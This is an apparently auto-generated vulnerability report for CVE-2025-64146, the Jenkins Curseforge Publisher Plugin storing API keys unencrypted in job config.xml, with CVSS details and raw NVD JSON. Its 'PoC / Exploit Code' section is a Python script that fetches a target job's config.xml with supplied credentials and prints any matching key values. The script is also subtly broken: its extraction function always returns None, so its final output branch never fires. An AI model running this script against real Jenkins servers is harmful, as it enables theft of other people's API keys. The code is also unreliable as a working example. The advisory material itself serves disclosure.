Security Vulnerability Report
中文
CVE-2025-64146 CVSS 4.3 MEDIUM

CVE-2025-64146

Published: 2025-10-29 14:15:59
Last Modified: 2025-11-04 22:16:41
Source: [email protected]

Description

Jenkins Curseforge Publisher Plugin 1.0 stores API Keys unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission, or access to the Jenkins controller file system.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:curseforge_publisher:1.0:*:*:*:*:jenkins:*:* - VULNERABLE
Jenkins Curseforge Publisher Plugin <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64146 PoC - Jenkins Curseforge Publisher Plugin API Key Disclosure # This PoC demonstrates how to retrieve unencrypted API keys from Jenkins config.xml import requests from xml.etree import ElementTree as ET def get_jenkins_config(jenkins_url, job_name, auth=None): """ Retrieve Jenkins job configuration XML """ config_url = f"{jenkins_url}/job/{job_name}/config.xml" response = requests.get(config_url, auth=auth) return response.text if response.status_code == 200 else None def extract_curseforge_api_key(config_xml): """ Extract unencrypted API key from plugin configuration """ try: root = ET.fromstring(config_xml) # Search for curseforge-related configuration elements for elem in root.iter(): if 'curseforge' in elem.tag.lower() or 'api' in elem.tag.lower(): if elem.text and len(elem.text.strip()) > 0: print(f"Found potential API key in {elem.tag}: {elem.text}") return None except ET.ParseError: print("Error parsing config.xml") return None def main(): jenkins_url = "http://target-jenkins-server:8080" job_name = "your-cursed-job-name" # Optional: Basic auth credentials auth = ('username', 'password') config_xml = get_jenkins_config(jenkins_url, job_name, auth) if config_xml: api_key = extract_curseforge_api_key(config_xml) if api_key: print(f"Exploited API Key: {api_key}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64146", "sourceIdentifier": "[email protected]", "published": "2025-10-29T14:15:59.457", "lastModified": "2025-11-04T22:16:41.450", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins Curseforge Publisher Plugin 1.0 stores API Keys unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission, or access to the Jenkins controller file system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-311"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:curseforge_publisher:1.0:*:*:*:*:jenkins:*:*", "matchCriteriaId": "5AA75189-8898-4173-87E5-818B6D713C95"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3562", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.